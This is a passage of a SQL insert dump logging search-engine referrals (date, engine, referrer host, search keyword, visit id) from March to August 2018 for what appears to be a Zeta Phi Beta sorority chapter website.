2018-03-26','google','www.google.com','',27507),(1804,'2018-03-26','google','google.com','',27508),(1805,'2018-03-26','google','www.google.com','',27541),(1806,'2018-03-27','google','www.google.com','',27556),(1807,'2018-03-27','yandex','yandex.ru','',27558),(1808,'2018-03-27','google','www.google.com','',27574),(1809,'2018-03-27','google','www.google.com','',27580),(1810,'2018-03-27','google','www.google.com','',27595),(1811,'2018-03-27','google','www.google.com','',27598),(1812,'2018-03-27','google','www.google.com','',27604),(1813,'2018-03-28','google','www.google.com','',27631),(1814,'2018-03-28','google','www.google.com','',27633),(1815,'2018-03-28','google','www.google.com','',27635),(1816,'2018-03-28','google','www.google.com','',27649),(1817,'2018-03-28','google','www.google.com','',27652),(1818,'2018-03-28','google','www.google.com','',27653),(1819,'2018-03-28','google','www.google.com','',27659),(1820,'2018-03-28','google','www.google.com','',27669),(1821,'2018-03-28','google','www.google.com','',27671),(1822,'2018-03-29','google','www.google.com','',27723),(1823,'2018-03-29','google','www.google.ru','',27726),(1824,'2018-03-29','google','com.google.android.gm','',27728),(1825,'2018-03-29','google','www.google.com','',27729),(1826,'2018-03-29','google','www.google.com','',27739),(1827,'2018-03-29','google','www.google.com','',27748),(1828,'2018-03-29','google','www.google.com','',27749),(1829,'2018-03-29','google','www.google.com','',27751),(1830,'2018-03-29','google','www.google.com','',27770),(1831,'2018-03-29','google','www.google.com','',27771),(1832,'2018-03-30','yandex','yandex.ru','',27794),(1833,'2018-03-30','yandex','yandex.ru','',27795),(1834,'2018-03-30','yandex','yandex.ru','',27806),(1835,'2018-03-30','google','www.google.com','',27819),(1836,'2018-03-30','google','www.google.com','',27823),(1837,'2018-03-30','google','www.google.com','',27825),(1838,'2018-03-30','google','www.google.com','',27842),(1839,'2018-03-30','google','www.google.com','',27849),(1840,'2018-03-30','google','www.google.com','',27859),(1841,'2018-03-30','google','www.google.com','https://zphiblgz.org/scholarship/application/?gf_token%3D2cb6161c37884f548e1355993249cdff',27860),(1842,'2018-03-30','bing','www.bing.com','ms walk 2018',27864),(1843,'2018-03-30','google','www.google.com','',27872),(1844,'2018-03-30','google','www.google.com','',27876),(1845,'2018-03-31','yandex','yandex.ru','',27896),(1846,'2018-03-31','google','www.google.com','',27910),(1847,'2018-03-31','google','www.google.com','',27924),(1848,'2018-03-31','yandex','yandex.ru','',27931),(1849,'2018-03-31','google','www.google.com','',27932),(1850,'2018-03-31','google','www.google.com','',27947),(1851,'2018-03-31','google','www.google.com','',27949),(1852,'2018-04-01','google','www.google.com','',27977),(1853,'2018-04-01','google','www.google.com','',27985),(1854,'2018-04-01','google','www.google.com','',27998),(1855,'2018-04-02','google','www.google.com','',28027),(1856,'2018-04-02','google','www.google.com','',28035),(1857,'2018-04-02','google','www.google.com','',28045),(1858,'2018-04-03','google','www.google.com','',28074),(1859,'2018-04-03','google','www.google.com','',28096),(1860,'2018-04-03','google','www.google.com','',28099),(1861,'2018-04-03','google','www.google.com','',28104),(1862,'2018-04-03','google','www.google.com','',28109),(1863,'2018-04-03','google','www.google.com','',28118),(1864,'2018-04-03','google','www.google.com','',28123),(1865,'2018-04-04','google','www.google.com','',28140),(1866,'2018-04-04','google','www.google.com','',28156),(1867,'2018-04-04','google','www.google.com','',28164),(1868,'2018-04-04','google','www.google.com','',28166),(1869,'2018-04-04','google','www.google.com','',28171),(1870,'2018-04-04','google','www.google.co.jp','',28172),(1871,'2018-04-04','google','www.google.com','',28176),(1872,'2018-04-04','google','www.google.com','',28179),(1873,'2018-04-05','google','www.google.com','',28222),(1874,'2018-04-05','google','www.google.com','',28247),(1875,'2018-04-05','google','www.google.com.tr','',28252),(1876,'2018-04-05','google','www.google.com','',28257),(1877,'2018-04-05','yandex','yandex.ru','',28259),(1878,'2018-04-05','yandex','yandex.ru','',28264),(1879,'2018-04-06','google','www.google.com','',28323),(1880,'2018-04-06','google','www.google.com','',28342),(1881,'2018-04-06','google','www.google.com','',28345),(1882,'2018-04-07','google','www.google.com','',28356),(1883,'2018-04-07','google','www.google.com','',28382),(1884,'2018-04-07','google','www.google.com','',28386),(1885,'2018-04-08','google','www.google.com','',28401),(1886,'2018-04-08','google','www.google.com','',28438),(1887,'2018-04-08','google','www.google.com','',28441),(1888,'2018-04-08','google','www.google.com','',28444),(1889,'2018-04-08','google','www.google.com','',28446),(1890,'2018-04-08','google','www.google.com','',28450),(1891,'2018-04-08','google','www.google.com','',28456),(1892,'2018-04-09','google','www.google.com','',28504),(1893,'2018-04-09','bing','www.bing.com','',28512),(1894,'2018-04-09','google','www.google.com','',28513),(1895,'2018-04-09','google','www.google.com','',28516),(1896,'2018-04-09','google','www.google.com','',28524),(1897,'2018-04-09','google','www.google.com','',28549),(1898,'2018-04-09','google','www.google.com','',28550),(1899,'2018-04-09','google','www.google.com','',28553),(1900,'2018-04-10','google','www.google.com','',28577),(1901,'2018-04-10','google','www.google.com','',28584),(1902,'2018-04-10','google','www.google.com','',28585),(1903,'2018-04-10','google','www.google.com','',28606),(1904,'2018-04-10','google','www.google.com','',28607),(1905,'2018-04-10','google','www.google.com','',28621),(1906,'2018-04-10','google','www.google.com','',28627),(1907,'2018-04-11','bing','www.bing.com','',28628),(1908,'2018-04-11','google','www.google.com','',28653),(1909,'2018-04-11','google','www.google.com','',28669),(1910,'2018-04-11','google','www.google.com','',28673),(1911,'2018-04-11','google','www.google.com','',28679),(1912,'2018-04-11','google','www.google.com','',28684),(1913,'2018-04-11','google','www.google.com','',28688),(1914,'2018-04-11','google','com.google.android.googlequicksearchbox','',28698),(1915,'2018-04-11','bing','www.bing.com','beta deha community action howard county md',28703),(1916,'2018-04-11','bing','www.bing.com','',28705),(1917,'2018-04-12','yandex','yandex.ru','',28722),(1918,'2018-04-12','google','www.google.com','',28741),(1919,'2018-04-12','google','www.google.com','',28745),(1920,'2018-04-12','google','www.google.com','',28749),(1921,'2018-04-12','google','www.google.com','',28751),(1922,'2018-04-12','google','www.google.com','',28752),(1923,'2018-04-12','google','com.google.android.googlequicksearchbox','',28757),(1924,'2018-04-13','bing','www.bing.com','',28780),(1925,'2018-04-13','google','www.google.com','',28781),(1926,'2018-04-13','google','www.google.com','',28784),(1927,'2018-04-13','google','www.google.com','',28811),(1928,'2018-04-13','google','www.google.com','',28819),(1929,'2018-04-14','google','www.google.com','',28862),(1930,'2018-04-14','google','www.google.com','',28870),(1931,'2018-04-14','google','www.google.com','',28874),(1932,'2018-04-15','google','www.google.com','',28907),(1933,'2018-04-15','bing','www.bing.com','mim conway schlorships',28910),(1934,'2018-04-15','google','www.google.com','',28911),(1935,'2018-04-15','google','www.google.com','',28921),(1936,'2018-04-15','google','www.google.com','',28924),(1937,'2018-04-15','bing','www.bing.com','',28929),(1938,'2018-04-15','google','google.com','',28932),(1939,'2018-04-16','google','www.google.com','',28955),(1940,'2018-04-16','google','www.google.com','',28957),(1941,'2018-04-16','google','www.google.com','',28959),(1942,'2018-04-16','yahoo','search.yahoo.com','',28961),(1943,'2018-04-16','google','www.google.com','',28962),(1944,'2018-04-16','bing','www.bing.com','',28964),(1945,'2018-04-16','google','www.google.com','',28965),(1946,'2018-04-16','google','www.google.com','',28973),(1947,'2018-04-16','google','www.google.com','',28977),(1948,'2018-04-17','google','www.google.com','',29013),(1949,'2018-04-17','google','www.google.com','',29027),(1950,'2018-04-17','google','www.google.com','',29031),(1951,'2018-04-17','google','www.google.com','',29036),(1952,'2018-04-17','google','www.google.com','',29037),(1953,'2018-04-17','bing','www.bing.com','',29040),(1954,'2018-04-17','google','www.google.com','',29049),(1955,'2018-04-17','google','www.google.com','',29051),(1956,'2018-04-18','bing','www.bing.com','',29068),(1957,'2018-04-18','google','www.google.com','',29081),(1958,'2018-04-18','google','google.com','',29085),(1959,'2018-04-18','google','www.google.com','',29087),(1960,'2018-04-18','google','www.google.com','',29096),(1961,'2018-04-18','google','www.google.com','',29097),(1962,'2018-04-19','google','www.google.com','',29130),(1963,'2018-04-20','google','google.com','',29156),(1964,'2018-04-20','google','www.google.com','',29179),(1965,'2018-04-20','google','www.google.com','',29180),(1966,'2018-04-20','yahoo','search.yahoo.com','',29185),(1967,'2018-04-21','google','www.google.com','',29215),(1968,'2018-04-21','google','www.google.com','',29220),(1969,'2018-04-21','yandex','yandex.ru','',29232),(1970,'2018-04-22','google','www.google.com','',29259),(1971,'2018-04-22','google','www.google.com','',29266),(1972,'2018-04-22','google','www.google.com','',29269),(1973,'2018-04-22','google','www.google.com','',29277),(1974,'2018-04-22','bing','www.bing.com','',29284),(1975,'2018-04-22','google','www.google.com','',29291),(1976,'2018-04-22','google','www.google.com','',29293),(1977,'2018-04-23','bing','www.bing.com','',29313),(1978,'2018-04-23','google','www.google.com','',29317),(1979,'2018-04-23','google','www.google.com','',29326),(1980,'2018-04-23','google','www.google.com','',29329),(1981,'2018-04-23','yandex','yandex.ru','',29338),(1982,'2018-04-24','google','www.google.com','',29374),(1983,'2018-04-24','google','www.google.com','',29381),(1984,'2018-04-24','google','www.google.com','',29387),(1985,'2018-04-24','google','www.google.com','',29388),(1986,'2018-04-24','google','www.google.com','',29393),(1987,'2018-04-25','google','www.google.com','',29430),(1988,'2018-04-25','google','www.google.com','',29437),(1989,'2018-04-25','yahoo','search.yahoo.com','',29439),(1990,'2018-04-25','google','www.google.com','',29448),(1991,'2018-04-25','google','www.google.com','',29449),(1992,'2018-04-25','google','com.google.android.googlequicksearchbox','',29451),(1993,'2018-04-25','bing','www.bing.com','',29455),(1994,'2018-04-25','google','www.google.com','',29458),(1995,'2018-04-25','google','www.google.com','',29471),(1996,'2018-04-26','google','www.google.com','',29511),(1997,'2018-04-26','google','www.google.com','',29516),(1998,'2018-04-26','google','www.google.com','',29524),(1999,'2018-04-26','google','www.google.com','',29531),(2000,'2018-04-26','google','www.google.com','',29533),(2001,'2018-04-27','google','www.google.com','',29557),(2002,'2018-04-27','google','www.google.com','',29559),(2003,'2018-04-27','google','www.google.com','',29560),(2004,'2018-04-27','google','www.google.com','',29565),(2005,'2018-04-27','google','com.google.android.googlequicksearchbox','',29580),(2006,'2018-04-27','google','www.google.com','',29581),(2007,'2018-04-28','google','www.google.com','',29630),(2008,'2018-04-29','google','www.google.com','',29649),(2009,'2018-04-29','google','www.google.com','',29670),(2010,'2018-04-29','bing','www.bing.com','',29680),(2011,'2018-04-29','google','www.google.com','',29683),(2012,'2018-04-30','google','www.google.com','',29711),(2013,'2018-04-30','google','www.google.com','',29717),(2014,'2018-04-30','google','www.google.com','',29724),(2015,'2018-04-30','google','www.google.com','',29737),(2016,'2018-04-30','google','www.google.com','',29741),(2017,'2018-04-30','google','www.google.com','',29744),(2018,'2018-05-01','yandex','yandex.ru','',29760),(2019,'2018-05-01','google','www.google.com','',29775),(2020,'2018-05-01','google','www.google.com','',29787),(2021,'2018-05-01','yandex','yandex.ru','',29788),(2022,'2018-05-01','google','www.google.com','',29795),(2023,'2018-05-01','google','www.google.com','',29796),(2024,'2018-05-02','google','www.google.com','ebony cogdell',29800),(2025,'2018-05-02','bing','www.bing.com','',29823),(2026,'2018-05-02','google','www.google.com','',29825),(2027,'2018-05-02','google','www.google.com','',29830),(2028,'2018-05-02','yahoo','search.yahoo.com','',29836),(2029,'2018-05-02','google','www.google.com','',29845),(2030,'2018-05-02','yahoo','search.yahoo.com','',29846),(2031,'2018-05-02','google','www.google.com','',29849),(2032,'2018-05-03','yandex','yandex.ru','',29890),(2033,'2018-05-03','google','www.google.com','',29893),(2034,'2018-05-03','google','www.google.com','',29897),(2035,'2018-05-03','google','www.google.com','',29901),(2036,'2018-05-04','google','google.com','',29934),(2037,'2018-05-04','google','www.google.com','',29935),(2038,'2018-05-04','google','www.google.com','',29936),(2039,'2018-05-04','google','www.google.com','',29940),(2040,'2018-05-04','google','www.google.com','',29944),(2041,'2018-05-04','google','www.google.com','',29951),(2042,'2018-05-05','google','www.google.com','',29971),(2043,'2018-05-05','google','www.google.com','',29985),(2044,'2018-05-05','google','google.com','',29987),(2045,'2018-05-05','google','www.google.com','',29992),(2046,'2018-05-05','google','www.google.com','',29997),(2047,'2018-05-05','google','www.google.com','',30008),(2048,'2018-05-05','google','www.google.com','',30009),(2049,'2018-05-06','google','www.google.com','',30032),(2050,'2018-05-06','google','www.google.com','',30036),(2051,'2018-05-06','google','www.google.com','',30037),(2052,'2018-05-06','google','www.google.com','',30039),(2053,'2018-05-06','google','www.google.com','',30040),(2054,'2018-05-06','google','www.google.com','',30043),(2055,'2018-05-06','google','www.google.com','',30051),(2056,'2018-05-06','google','www.google.com','',30053),(2057,'2018-05-06','google','www.google.com','',30055),(2058,'2018-05-06','bing','www.bing.com','',30056),(2059,'2018-05-06','google','www.google.com','',30060),(2060,'2018-05-06','google','www.google.com','',30061),(2061,'2018-05-06','google','com.google.android.googlequicksearchbox','',30062),(2062,'2018-05-06','google','www.google.com','',30063),(2063,'2018-05-06','google','www.google.com','',30065),(2064,'2018-05-06','google','www.google.com','',30066),(2065,'2018-05-07','google','www.google.com','',30098),(2066,'2018-05-08','google','www.google.com','',30138),(2067,'2018-05-08','google','www.google.com','',30142),(2068,'2018-05-08','google','www.google.com','',30143),(2069,'2018-05-08','google','www.google.com','',30150),(2070,'2018-05-08','google','www.google.com','',30156),(2071,'2018-05-08','google','www.google.com','',30163),(2072,'2018-05-08','yandex','yandex.ru','',30165),(2073,'2018-05-08','google','www.google.com','',30175),(2074,'2018-05-08','google','www.google.com','',30178),(2075,'2018-05-09','bing','www.bing.com','sample reommendation letter for a zeta phi beta scholarship',30215),(2076,'2018-05-09','google','www.google.com','',30222),(2077,'2018-05-09','google','www.google.com','',30241),(2078,'2018-05-10','google','www.google.com.af','',30247),(2079,'2018-05-10','google','www.google.com','',30264),(2080,'2018-05-10','google','www.google.com','',30269),(2081,'2018-05-11','bing','www.bing.com','',30299),(2082,'2018-05-11','google','www.google.com','',30302),(2083,'2018-05-11','google','www.google.com','',30303),(2084,'2018-05-11','google','google.com','',30304),(2085,'2018-05-11','google','www.google.com','',30312),(2086,'2018-05-12','google','www.google.com','',30366),(2087,'2018-05-13','google','www.google.com','',30399),(2088,'2018-05-13','google','www.google.com','',30400),(2089,'2018-05-13','google','www.google.com','',30401),(2090,'2018-05-13','google','www.google.com','',30405),(2091,'2018-05-14','google','www.google.com','',30434),(2092,'2018-05-15','google','com.google.android.googlequicksearchbox','',30461),(2093,'2018-05-15','google','www.google.com','',30473),(2094,'2018-05-15','google','www.google.com','',30490),(2095,'2018-05-15','google','www.google.com','',30495),(2096,'2018-05-16','google','www.google.com','',30509),(2097,'2018-05-16','bing','www.bing.com','',30512),(2098,'2018-05-17','google','www.google.com','',30553),(2099,'2018-05-17','google','www.google.com','',30555),(2100,'2018-05-17','google','www.google.com','',30556),(2101,'2018-05-17','google','www.google.com','',30559),(2102,'2018-05-17','google','www.google.com','',30560),(2103,'2018-05-17','google','www.google.com','',30561),(2104,'2018-05-17','google','www.google.com','',30562),(2105,'2018-05-18','google','www.google.com','',30587),(2106,'2018-05-18','google','www.google.com','',30589),(2107,'2018-05-19','google','www.google.com','',30619),(2108,'2018-05-19','google','www.google.com','',30626),(2109,'2018-05-20','google','www.google.com','',30650),(2110,'2018-05-20','google','www.google.com','',30652),(2111,'2018-05-20','google','www.google.com','',30666),(2112,'2018-05-20','google','www.google.com','',30670),(2113,'2018-05-21','google','www.google.com','',30675),(2114,'2018-05-21','google','www.google.com','',30682),(2115,'2018-05-21','google','www.google.com','',30695),(2116,'2018-05-21','google','www.google.com','',30699),(2117,'2018-05-21','google','www.google.com','',30701),(2118,'2018-05-21','google','www.google.com','',30707),(2119,'2018-05-21','google','www.google.com','',30710),(2120,'2018-05-21','google','www.google.com','',30712),(2121,'2018-05-21','google','www.google.com','',30713),(2122,'2018-05-21','google','www.google.com','',30720),(2123,'2018-05-22','google','www.google.com','',30749),(2124,'2018-05-22','google','www.google.com','',30751),(2125,'2018-05-23','bing','www.bing.com','',30775),(2126,'2018-05-23','google','www.google.com','',30787),(2127,'2018-05-23','google','www.google.com','',30795),(2128,'2018-05-23','google','www.google.com','',30809),(2129,'2018-05-24','google','www.google.com.ph','',30836),(2130,'2018-05-24','google','www.google.com','',30846),(2131,'2018-05-24','google','www.google.com','',30866),(2132,'2018-05-24','google','www.google.com','',30867),(2133,'2018-05-25','bing','www.bing.com','',30873),(2134,'2018-05-25','google','www.google.com','',30910),(2135,'2018-05-25','google','www.google.com','',30911),(2136,'2018-05-25','google','www.google.com','',30912),(2137,'2018-05-25','google','www.google.com','',30920),(2138,'2018-05-25','google','google.com','',30922),(2139,'2018-05-26','google','www.google.com','',30944),(2140,'2018-05-26','google','www.google.com','',30946),(2141,'2018-05-27','google','www.google.com','',30972),(2142,'2018-05-28','google','www.google.com','',30989),(2143,'2018-05-28','google','www.google.com','',30996),(2144,'2018-05-28','google','www.google.com','',31001),(2145,'2018-05-28','google','www.google.com','',31005),(2146,'2018-05-29','google','www.google.com','',31016),(2147,'2018-05-29','google','www.google.com','',31031),(2148,'2018-05-29','bing','www.bing.com','',31035),(2149,'2018-05-29','google','www.google.com','',31036),(2150,'2018-05-29','google','www.google.com','',31063),(2151,'2018-05-29','google','www.google.com','',31073),(2152,'2018-05-30','yandex','yandex.ru','',31089),(2153,'2018-05-30','google','www.google.com','',31096),(2154,'2018-05-30','google','www.google.com','',31100),(2155,'2018-05-30','google','www.google.com','',31113),(2156,'2018-05-31','yandex','yandex.ru','',31123),(2157,'2018-05-31','bing','www.bing.com','',31134),(2158,'2018-05-31','google','www.google.com','',31135),(2159,'2018-05-31','google','www.google.com','',31137),(2160,'2018-05-31','google','www.google.com','',31145),(2161,'2018-06-01','google','www.google.com','',31186),(2162,'2018-06-01','google','www.google.com','',31194),(2163,'2018-06-02','yandex','yandex.ru','',31203),(2164,'2018-06-02','google','www.google.com','',31222),(2165,'2018-06-02','google','www.google.co.jp','',31226),(2166,'2018-06-03','google','www.google.com','',31247),(2167,'2018-06-03','google','www.google.com','',31255),(2168,'2018-06-04','yahoo','r.search.yahoo.com','',31299),(2169,'2018-06-04','bing','www.bing.com','',31306),(2170,'2018-06-04','yandex','yandex.ru','',31307),(2171,'2018-06-04','google','www.google.com','',31308),(2172,'2018-06-05','google','www.google.com','',31322),(2173,'2018-06-05','google','www.google.com','',31346),(2174,'2018-06-06','google','www.google.com','',31385),(2175,'2018-06-06','google','www.google.com','',31399),(2176,'2018-06-06','google','www.google.com','',31407),(2177,'2018-06-07','google','www.google.com','',31433),(2178,'2018-06-07','google','www.google.com','',31437),(2179,'2018-06-07','yandex','yandex.ru','',31440),(2180,'2018-06-08','google','www.google.com','',31472),(2181,'2018-06-08','google','www.google.com','',31473),(2182,'2018-06-08','google','www.google.com','',31477),(2183,'2018-06-08','yahoo','search.yahoo.com','',31478),(2184,'2018-06-08','google','www.google.com','',31485),(2185,'2018-06-08','google','www.google.com','',31486),(2186,'2018-06-08','bing','www.bing.com','',31497),(2187,'2018-06-09','google','www.google.com','',31536),(2188,'2018-06-09','yahoo','r.search.yahoo.com','',31537),(2189,'2018-06-09','google','www.google.com','',31539),(2190,'2018-06-10','google','www.google.com','',31571),(2191,'2018-06-10','google','www.google.com','',31574),(2192,'2018-06-11','google','www.google.com','',31602),(2193,'2018-06-11','google','www.google.com','',31617),(2194,'2018-06-11','google','www.google.com','',31620),(2195,'2018-06-12','google','www.google.com','',31648),(2196,'2018-06-12','google','www.google.com','',31654),(2197,'2018-06-12','google','www.google.com','',31658),(2198,'2018-06-13','google','www.google.com','',31716),(2199,'2018-06-13','google','www.google.com','',31717),(2200,'2018-06-13','google','www.google.com','',31734),(2201,'2018-06-14','google','www.google.com','',31736),(2202,'2018-06-14','google','www.google.com','',31749),(2203,'2018-06-14','google','www.google.com','',31753),(2204,'2018-06-14','google','com.google.android.googlequicksearchbox','',31757),(2205,'2018-06-14','google','www.google.com','',31759),(2206,'2018-06-14','google','www.google.com','',31766),(2207,'2018-06-15','google','www.google.com','',31789),(2208,'2018-06-15','google','www.google.com','',31805),(2209,'2018-06-15','google','www.google.com','',31813),(2210,'2018-06-15','google','www.google.com','',31819),(2211,'2018-06-16','google','www.google.com','',31843),(2212,'2018-06-16','google','www.google.com','',31848),(2213,'2018-06-17','google','www.google.com','',31888),(2214,'2018-06-17','google','www.google.com','',31890),(2215,'2018-06-17','google','www.google.com','',31896),(2216,'2018-06-18','google','www.google.com','',31897),(2217,'2018-06-18','google','www.google.com','',31926),(2218,'2018-06-19','google','www.google.com','',31950),(2219,'2018-06-19','google','www.google.com','',31970),(2220,'2018-06-20','google','www.google.com','',32013),(2221,'2018-06-20','google','www.google.com','',32018),(2222,'2018-06-20','google','www.google.com','',32019),(2223,'2018-06-21','google','www.google.com','',32065),(2224,'2018-06-22','google','www.google.com','',32105),(2225,'2018-06-22','google','www.google.com','',32106),(2226,'2018-06-22','google','www.google.com','',32113),(2227,'2018-06-23','google','www.google.com','',32149),(2228,'2018-06-23','google','www.google.com','',32150),(2229,'2018-06-23','google','www.google.com','',32152),(2230,'2018-06-23','google','www.google.com','',32163),(2231,'2018-06-24','yandex','yandex.ru','',32182),(2232,'2018-06-24','google','www.google.com','',32197),(2233,'2018-06-24','google','www.google.com','',32201),(2234,'2018-06-25','google','www.google.com','',32233),(2235,'2018-06-25','bing','www.bing.com','history of zeta phi beta sorority',32236),(2236,'2018-06-25','google','www.google.com','',32239),(2237,'2018-06-26','google','www.google.com','',32272),(2238,'2018-06-26','google','www.google.com','',32288),(2239,'2018-06-26','google','www.google.com','',32295),(2240,'2018-06-26','google','www.google.com','',32297),(2241,'2018-06-26','google','www.google.com','',32299),(2242,'2018-06-27','google','www.google.com','',32319),(2243,'2018-06-27','google','com.google.android.googlequicksearchbox','',32324),(2244,'2018-06-27','google','www.google.com','',32328),(2245,'2018-06-27','google','www.google.com','',32332),(2246,'2018-06-27','bing','www.bing.com','',32337),(2247,'2018-06-28','google','www.google.com','',32376),(2248,'2018-06-28','google','www.google.com','',32381),(2249,'2018-06-28','google','www.google.com','',32384),(2250,'2018-06-28','google','www.google.com','',32388),(2251,'2018-06-29','yandex','yandex.ru','',32418),(2252,'2018-06-29','google','www.google.com','',32427),(2253,'2018-06-29','google','www.google.com','',32437),(2254,'2018-06-30','yandex','yandex.ru','',32453),(2255,'2018-06-30','google','www.google.com','',32473),(2256,'2018-06-30','google','www.google.com','',32476),(2257,'2018-06-30','google','www.google.com','',32480),(2258,'2018-07-01','baidu','www.baidu.com','doctorwvd',32487),(2259,'2018-07-01','google','google.com','',32501),(2260,'2018-07-01','google','www.google.com','',32514),(2261,'2018-07-01','google','images.google.com','',32516),(2262,'2018-07-02','yandex','yandex.ru','',32559),(2263,'2018-07-02','google','www.google.com','',32577),(2264,'2018-07-02','google','www.google.com','',32586),(2265,'2018-07-03','google','www.google.com','',32622),(2266,'2018-07-03','google','www.google.com','',32627),(2267,'2018-07-04','google','www.google.com','',32674),(2268,'2018-07-04','google','www.google.com','',32681),(2269,'2018-07-04','google','www.google.com','',32701),(2270,'2018-07-05','google','www.google.com','',32708),(2271,'2018-07-05','google','www.google.com','',32743),(2272,'2018-07-05','google','www.google.com','',32757),(2273,'2018-07-06','google','www.google.com','',32776),(2274,'2018-07-06','yandex','yandex.ru','',32780),(2275,'2018-07-06','google','www.google.com','',32794),(2276,'2018-07-06','google','www.google.com','',32797),(2277,'2018-07-06','google','www.google.co.in','yerpedu mandalam zphi school 10th',32801),(2278,'2018-07-07','google','www.google.com','',32845),(2279,'2018-07-07','google','www.google.com','',32846),(2280,'2018-07-07','bing','www.bing.com','',32850),(2281,'2018-07-08','google','www.google.com','',32894),(2282,'2018-07-08','google','www.google.com','',32900),(2283,'2018-07-08','google','www.google.com','',32902),(2284,'2018-07-09','yandex','yandex.ru','',32923),(2285,'2018-07-09','yandex','yandex.ru','',32935),(2286,'2018-07-09','google','www.google.com','',32941),(2287,'2018-07-09','bing','www.bing.com','',32943),(2288,'2018-07-10','yandex','yandex.ru','',32976),(2289,'2018-07-10','google','www.google.com','',32978),(2290,'2018-07-10','google','www.google.com','',32985),(2291,'2018-07-10','google','www.google.com','',32990),(2292,'2018-07-11','google','www.google.com','',33031),(2293,'2018-07-12','google','www.google.com','',33099),(2294,'2018-07-12','google','www.google.com','',33106),(2295,'2018-07-13','google','www.google.com','',33142),(2296,'2018-07-13','google','www.google.com','',33154),(2297,'2018-07-14','google','www.google.com','',33180),(2298,'2018-07-15','google','www.google.com','',33216),(2299,'2018-07-15','google','www.google.com','',33220),(2300,'2018-07-15','google','www.google.com','',33238),(2301,'2018-07-16','yandex','yandex.ru','',33258),(2302,'2018-07-16','google','www.google.com','',33268),(2303,'2018-07-16','google','www.google.com','',33270),(2304,'2018-07-16','google','www.google.com','',33277),(2305,'2018-07-17','google','www.google.com','',33305),(2306,'2018-07-18','google','www.google.com','',33335),(2307,'2018-07-18','bing','www.bing.com','',33364),(2308,'2018-07-18','google','www.google.com','',33372),(2309,'2018-07-18','google','www.google.com','',33374),(2310,'2018-07-18','google','www.google.com','',33378),(2311,'2018-07-18','google','www.google.com','',33383),(2312,'2018-07-19','google','www.google.com','',33416),(2313,'2018-07-19','google','www.google.com','',33421),(2314,'2018-07-19','google','www.google.com','',33422),(2315,'2018-07-19','google','www.google.com','',33437),(2316,'2018-07-20','google','www.google.com','',33444),(2317,'2018-07-20','google','www.google.com','',33465),(2318,'2018-07-21','google','www.google.com','',33516),(2319,'2018-07-21','google','www.google.com','',33522),(2320,'2018-07-22','google','www.google.gr','',33542),(2321,'2018-07-22','google','www.google.com','',33573),(2322,'2018-07-22','google','www.google.com','',33578),(2323,'2018-07-23','google','www.google.com','',33612),(2324,'2018-07-23','google','www.google.com','',33632),(2325,'2018-07-24','google','google.com','',33644),(2326,'2018-07-24','google','www.google.com','',33659),(2327,'2018-07-24','google','com.google.android.googlequicksearchbox','',33669),(2328,'2018-07-24','google','www.google.com','',33670),(2329,'2018-07-24','google','www.google.com','',33675),(2330,'2018-07-25','google','www.google.com','',33745),(2331,'2018-07-25','google','www.google.com','',33758),(2332,'2018-07-26','yandex','yandex.ru','',33785),(2333,'2018-07-26','google','www.google.com','',33807),(2334,'2018-07-26','google','www.google.com','',33815),(2335,'2018-07-26','google','www.google.com','',33816),(2336,'2018-07-26','google','com.google.android.googlequicksearchbox','',33817),(2337,'2018-07-27','yandex','yandex.ru','',33845),(2338,'2018-07-27','google','www.google.com','',33868),(2339,'2018-07-27','bing','www.bing.com','conway scholarship',33881),(2340,'2018-07-28','yandex','yandex.ru','',33913),(2341,'2018-07-28','google','www.google.com','',33933),(2342,'2018-07-28','google','www.google.com','',33940),(2343,'2018-07-29','yandex','yandex.ru','',33958),(2344,'2018-07-29','google','com.google.android.googlequicksearchbox','',33969),(2345,'2018-07-29','google','www.google.com','',33974),(2346,'2018-07-30','yandex','yandex.ru','',34003),(2347,'2018-07-30','google','www.google.com','',34029),(2348,'2018-07-31','bing','www.bing.com','',34063),(2349,'2018-07-31','yandex','yandex.ru','',34083),(2350,'2018-07-31','google','www.google.com','',34103),(2351,'2018-07-31','google','www.google.com','',34110),(2352,'2018-08-01','google','www.google.com','',34140),(2353,'2018-08-01','google','www.google.com','',34143),(2354,'2018-08-01','google','www.google.com','',34153),(2355,'2018-08-01','google','www.google.com','',34160),(2356,'2018-08-01','google','www.google.com','',34167),(2357,'2018-08-02','google','www.google.com','',34193),(2358,'2018-08-02','google','www.google.com','',34200),(2359,'2018-08-02','google','www.google.com','',34216),(2360,'2018-08-03','google','www.google.com','',34249),(2361,'2018-08-03','google','www.google.com','',34256),(2362,'2018-08-04','google','www.google.com','',34269),(2363,'2018-08-04','google','www.google.com','',34285),(2364,'2018-08-04','google','www.google.com','',34299),(2365,'2018-08-05','google','www.google.com','',34313),(2366,'2018-08-06','google','www.google.com','',34349),(2367,'2018-08-06','google','www.google.com','',34352),(2368,'2018-08-06','google','www.google.com','',34355),(2369,'2018-08-06','google','www.google.com','',34357),(2370,'2018-08-06','bing','www.bing.com','',34358),(2371,'2018-08-06','google','www.google.com','',34359),(2372,'2018-08-06','google','www.google.com','',34373),(2373,'2018-08-06','google','google.com','',34374),(2374,'2018-08-06','google','google.com','',34375),(2375,'2018-08-06','google','google.com','',34376),(2376,'2018-08-07','google','www.google.com','',34378),(2377,'2018-08-07','bing','www.bing.com','gamma alpha gamma zeta chapter of zeta phi beta sorority',34407),(2378,'2018-08-07','yahoo','r.search.yahoo.com','',34412),(2379,'2018-08-07','google','www.google.com','',34414),(2380,'2018-08-07','yandex','yandex.ru','',34418),(2381,'2018-08-08','google','www.google.com','',34439),(2382,'2018-08-08','google','www.google.com','',34452),(2383,'2018-08-08','google','www.google.com','',34457),(2384,'2018-08-08','yahoo','r.search.yahoo.com','',34459),(2385,'2018-08-08','google','www.google.com','',34464),(2386,'2018-08-08','google','www.google.com','',34480),(2387,'2018-08-08','google','www.google.com','',34482),(2388,'2018-08-09','google','www.google.com','',34503),(2389,'2018-08-09','google','www.google.com','',34511),(2390,'2018-08-09','google','www.google.com','',34520),(2391,'2018-08-09','google','www.google.com','',34537),(2392,'2018-08-10','bing','www.bing.com','gamma alpha gamma zeta chapter- zeta phi beta sorority inc',34543),(2393,'2018-08-10','google','www.google.com','',34571),(2394,'2018-08-10','google','www.google.com','',34576),(2395,'2018-08-10','google','www.google.com','',34577),(2396,'2018-08-10','google','www.google.com','',34593),(2397,'2018-08-11','bing','www.bing.com','graduate chapters of zeta phi beta in 